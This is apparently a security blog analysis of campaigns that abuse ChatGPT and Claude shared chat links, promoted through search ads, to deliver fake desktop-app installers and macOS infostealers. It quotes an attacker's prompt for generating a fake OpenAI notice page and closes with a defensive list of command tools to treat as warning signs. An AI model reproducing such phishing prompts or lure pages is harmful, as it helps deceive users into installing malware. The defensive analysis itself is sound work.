You search Google for ChatGPT, click the first ad. The link is
chatgpt.com/s/xxx. The page loads with the familiar ChatGPT
interface: conversation list on the left, a system notification in the
center: “We’re experiencing high traffic right now. Download our desktop
app to continue.” Below it, a download button. You click it, download an
installer, run it.
Every step felt normal. Green lock in the address bar, domain is
chatgpt.com. You were on a site you trust, saw something
that looked like an official notice, clicked a download button that
looked official.
This is not hypothetical. It is a real attack disclosed by Push Security at the end of May 2026. BleepingComputer independently reproduced the same chain. Kaspersky had already documented an earlier variant five months prior. Three organizations are pointing at the same thing: attackers are systematically using ChatGPT and Claude’s shared chat links to distribute malware.
ChatGPT has a feature that most users overlook.
When you ask ChatGPT to write HTML/CSS code, it does not just print
the code as text. It has a code rendering feature: it can display the
rendered web page directly in the chat interface, similar to opening a
local HTML file in a browser. Two controls appear above the rendered
page: Show code and Remix with ChatGPT,
reminding you that this is generated from custom code.
The attacker’s workflow takes three steps.
Step one: open ChatGPT, write a prompt. “Generate an HTML page styled as an OpenAI system maintenance notice. High traffic has made the web version temporarily unavailable. Direct users to download the desktop app to continue. The download button should point to openew.app.”
Step two: ChatGPT generates the HTML and renders it in the chat. A page that looks like an official notification: dark background, OpenAI branding, a prominent download button.
Step three: the attacker clicks Share, generating a
chatgpt.com/s/xxx link. Then they buy a Google ad targeting
search terms like chatgpt, chatgpt free, and
common typos (chatgo, chatgot,
cvhatgpt), pointing the ad at the shared chat.
When a user searches for ChatGPT, clicks the ad, and lands on this
link, they see the full ChatGPT interface: the sidebar, the AI response
area, and the Show code / Remix with ChatGPT
controls. Inside the response area sits the attacker’s fake
notification. The download button is just an HTML hyperlink pointing to
openew[.]app, a site that clones OpenAI’s official download
page down to the last detail. The installer the user downloads there is
malware.
ChatGPT does not have the ability to “pop up a download
prompt.” What it can do is render a web page of the attacker’s
choosing under chatgpt.com, one of the most trusted domains
on the internet. The attacker does not need to compromise any system,
jailbreak any model, or use prompt injection. They just need a free
account, an HTML prompt, and a Google Ads budget.
On the same day, attackers used the same technique on Claude. Both BleepingComputer and Push Security confirmed this variant.
The attacker created a shared Claude conversation disguised as an
Apple Support-style “Claude Code on Mac Installation Guide.” The guide
instructed users to open Terminal and paste a curl command.
Users who followed the steps executed a command that downloaded a macOS
infostealer from the attacker’s server.
The attack logic is the same across both platforms, but the ChatGPT variant demands less from its victims. The Claude version still requires the user to execute a command—the traditional ClickFix pattern. The ChatGPT rendered version eliminates that step. The user just has to click a download button on a page that looks like a ChatGPT system notification.
Every step in this attack chain traces back to techniques that were already well established. The methods are not new. What changed is not the attack technique itself—it is that each generation removes one more step that would make a user suspicious.
In 2024, ClickFix appeared. An attacker sends an email with an HTML attachment. The page displays a message: “Word plugin missing. Paste this command to fix.” The user opens the Run dialog, pastes, presses Enter. The malware starts executing. The problem with this approach was obvious. A stranger’s email attachment asking you to open a command prompt? Most people stop there. By 2025, attackers made the step less conspicuous: they embedded malicious commands into legitimate-looking websites (hijacking WordPress sites or using Traffic Direction Systems). Users visiting those seemingly normal sites would encounter a fake Cloudflare CAPTCHA or a fake broadband login page asking them to paste a command for verification.
In late 2025, attackers discovered AI shared conversations. Huntress and Kaspersky both documented the same technique: attackers created IT help conversations on ChatGPT and Grok (e.g., “How to free up disk space on Mac”), embedded malicious commands in the dialogue, shared the links, and promoted them through Google Ads. Users searching for macOS troubleshooting would open what looked like a cleaning guide generated by an “AI assistant,” which then directed them to open Terminal and run a command. This version still kept the command-execution step—users would hesitate—but the attackers leveraged the credibility of AI conversations. A “cleaning tip from an AI assistant” triggers far less suspicion than a “verification instruction on an unfamiliar HTTP page.”
In March 2026, attackers pivoted to developer tools. EclecticIQ
found that attackers replicated official install pages on domains
like geminicli.co.com and claudecode.co.com,
tricking developers into running PowerShell commands. The same actor
operated over 30 domains impersonating Node.js, Chocolatey, KeePassXC,
Monero, and other developer tools.
In May 2026, the last point of friction disappeared. Attackers no longer needed users to open a terminal or paste a command. They just needed users to see a download button on a ChatGPT page and click it. This step relies on ChatGPT’s code rendering: placing a fake notification page directly under a real ChatGPT URL, surrounded by the real ChatGPT UI.
Kaspersky reported at HORIZONS 2026 that between January and May, its products detected over 92,000 attacks disguised as AI services like ChatGPT, Claude, and Gemini. Fake ChatGPT apps accounted for 49%, while fake Claude and Gemini apps each made up roughly 18%. The Silver Fox APT group has also been distributing fake Claude applications targeting Windows, macOS, and Linux.
This has nothing to do with AI model security. What the attackers
borrowed is not the reasoning capability of an LLM—it is the trust that
chatgpt.com carries in browsers, in URL filters, and in
users’ minds.
Domain reputation systems, URL categorization, and Safe Browsing
databases all
classify chatgpt.com and claude.ai as safe
domains. And they are correct. But a safe domain does not mean
anything anyone puts under that domain is safe.
When AI companies designed the sharing feature, they signed a product
contract: make collaboration easier. What they did not realize is that
the same feature also signed a content hosting contract. Allowing users
to publish HTML/CSS content that ChatGPT renders as a web page under
chatgpt.com is functionally equivalent to letting anyone
use your domain for web hosting. And content hosting platforms carry a
full set of security responsibilities: content moderation, abuse
detection, verified publishers, reporting mechanisms, rate limiting,
automatic expiration. AI companies signed none of these. But the product
feature already signed them into it.
This pattern is not unique to AI platforms. The 2017 Google Docs OAuth worm followed the same logic: attackers did not register fake domains; they placed malicious OAuth applications inside Google’s own permission system. WIRED’s coverage quoted a security researcher: “What made this work is that it tricked the user into granting permissions to a third-party application inside Google’s own authorization system.” Google Docs shared links, Dropbox shared folders, GitHub Gists, Notion public pages—every major platform has stepped in the same hole. Cisco Talos named this pattern Platform-as-a-Proxy in April 2026: attackers systematically repurpose SaaS platforms’ notification pipelines and sharing features as distribution channels.
AI platforms differ in two respects. First, attackers use prompts to
constrain the AI into generating phishing content, instead of writing
HTML themselves. Second, ChatGPT’s rendering capability makes the attack
page visually indistinguishable from the platform’s own interface. It is
hard to tell with the naked eye whether ChatGPT is trying to help you,
or whether an attacker has placed a fake page inside ChatGPT’s UI. The
only signal is the Show code button—and that requires you
to actively notice it.
Neither OpenAI nor Anthropic has issued a statement or committed to
fixing the abuse of shared links. ChatGPT Enterprise can restrict
internal users from creating public shared links, but this does nothing
to stop employees from accessing malicious shared links created
externally on personal devices. Safe Browsing and URL reputation systems
evaluate domains, not individual paths under
chatgpt.com.
The browser-level detection offered by Push Security is the only deployed solution that works. It tracks the full redirect chain—from search ad to shared link to malicious download—and blocks the interaction during page rendering. EDR behavioral detection can serve as a secondary layer: monitoring command line execution or first-run unfamiliar binaries shortly after a shared AI link is visited. But both of these are endpoint-side defenses. The start of the attack chain—a user clicking an ad on a Google search results page—currently has no one blocking it.
The security community’s response has been remarkably quiet. Zero discussion on Hacker News, zero on Reddit’s r/netsec or r/cybersecurity, one victim’s self-report on r/ChatGPT with zero comments. No independent security researcher has published a technical analysis of this.
This is not because the attack is insignificant. 92,000 detections is not a small number. The problem is that this attack does not fit into any existing threat classification: it is not prompt injection, not model security, not traditional phishing. The security community has not yet figured out which box to put it in.
One simple rule: a shared AI link’s URL carries zero safety
signals. chatgpt.com/s/xxx requires the same level of
vigilance as evil.com/phish.
The simplest practice: treat any of the following in a shared ChatGPT, Claude, or any AI platform link as malicious.
curl, wget,
bash, osascript,
Invoke-WebRequest, or cmd /cchatgpt.com/s/ or
claude.ai/share/)Show code button is visible)For security teams: monitor access to chatgpt.com/s/ and
claude.ai/share/ paths, and raise the risk score for
traffic arriving from search ad referrers. Add ClickFix rules to
security training: any page that tells you to paste a command into a
terminal requires verification before execution. Ensure software is only
installed from official download pages or the corporate IT portal—never
from shared chat links.
The platform side needs deeper fixes. Content moderation, automatic flagging of high-risk behaviors (downloads, command execution), verified publisher badges for official content—these are baseline security practices for content hosting platforms, and none of them exist on AI platforms today.
What the attackers did is not complicated. They simply asked a question anyone could ask: if I put a piece of HTML on a shared ChatGPT page, what does the user actually see? The answer: a full web page, under one of the most trusted domains in the world, complete with a green lock icon and the complete ChatGPT interface.